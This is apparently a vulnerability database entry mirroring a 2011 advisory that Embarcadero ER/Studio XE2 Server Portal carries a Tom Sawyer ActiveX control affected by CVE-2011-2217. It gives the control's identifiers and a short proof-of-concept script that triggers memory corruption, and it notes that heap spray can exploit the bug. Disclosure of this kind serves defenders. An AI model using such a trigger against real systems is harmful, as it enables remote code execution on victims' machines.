Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormRgodPACKETSTORM:104882
HistorySep 08, 2011 - 12:00 a.m.

Embarcadero ER/Studio XE2 Server Portal Code Execution

2011-09-0800:00:00
rgod
packetstormsecurity.com
25

0.958 High

EPSS

Percentile

99.4%

JSON
`  
See: CVE-2011-2217  
reference url: http://www.securityfocus.com/bid/48099  
  
The mentioned product is vulnerable to the same issue.  
  
download url: https://downloads.embarcadero.com/free/er_studio_portal  
  
ActiveX settings:   
ProgID: TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1  
CLSID: {658ED6E7-0DA1-4ADD-B2FB-095F08091118}  
Binary path: D:\Program Files\Embarcadero\ERStudioPortal1.6\PortalIntf\tsgetx71ex553.dll  
Safe for scripting (registry): true  
Safe for initialize (registry): true  
  
poc:  
  
<script>  
var obj = new ActiveXObject("TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1");  
</script>  
  
then the dll will try to call inside an unitialized memory region  
which is reachable by an attacker through heap spray.  
  
//rgod  
`

Related

prion 1
securityvulns 2
saint 4
cvelist 1
nessus 3
checkpoint_advisories 1
cve 1
packetstorm 1
nvd 1
openvas 2
vmware 2
prion
prion
Memory corruption
2011-06-06 19:55:00
securityvulns
securityvulns
iDefense Security Advisory 05.03.11: Tom Sawyer GET Extension Factory COM Object Instantiation Memory Corruption Vulnerability
2011-06-11 00:00:00
VMWare VirtualCenter ActiveX memory corruption
2011-06-11 00:00:00
saint
saint
Tom Sawyer GET Extension Factory COM Object Instantiation Memory Corruption
2011-06-19 00:00:00
Tom Sawyer GET Extension Factory COM Object Instantiation Memory Corruption
2011-06-19 00:00:00
Tom Sawyer GET Extension Factory COM Object Instantiation Memory Corruption
2011-06-19 00:00:00
cvelist
cvelist
CVE-2011-2217
2011-06-06 19:00:00
nessus
nessus
Tom Sawyer Software GET Extension Factory COM Object Instantiation Memory Corruption
2011-06-07 00:00:00
VMware ESX / ESXi Multiple Vulnerabilities (VMSA-2011-0009) (remote check)
2016-03-04 00:00:00
VMSA-2011-0009 : VMware hosted product updates, ESX patches and VI Client update resolve multiple security issues
2011-06-06 00:00:00
checkpoint_advisories
checkpoint_advisories
Tom Sawyer ActiveX Control Memory Corruption (CVE-2011-2217)
2011-11-01 00:00:00
cve
cve
CVE-2011-2217
2011-06-06 19:55:03
packetstorm
packetstorm
Tom Sawyer Software GET Extension Factory Remote Code Execution
2012-06-11 00:00:00
nvd
nvd
CVE-2011-2217
2011-06-06 19:55:03
openvas
openvas
VMSA-2011-0009.3 VMware hosted product updates, ESX patches and VI Client update resolve multiple security issues
2012-03-16 00:00:00
VMware ESXi/ESX patches and VI Client update resolve multiple security issues (VMSA-2011-0009.3)
2012-03-16 00:00:00
vmware
vmware
VMware hosted product updates, ESX patches and VI Client update resolve multiple security issues
2011-06-02 00:00:00
VMware hosted product updates, ESX patches and VI Client update resolve multiple security issue
2011-06-02 00:00:00

0.958 High

EPSS

Percentile

99.4%

JSON
Related for PACKETSTORM:104882
prion1securityvulns2saint4cvelist1nessus3checkpoint_advisories1cve1packetstorm1nvd1openvas2vmware2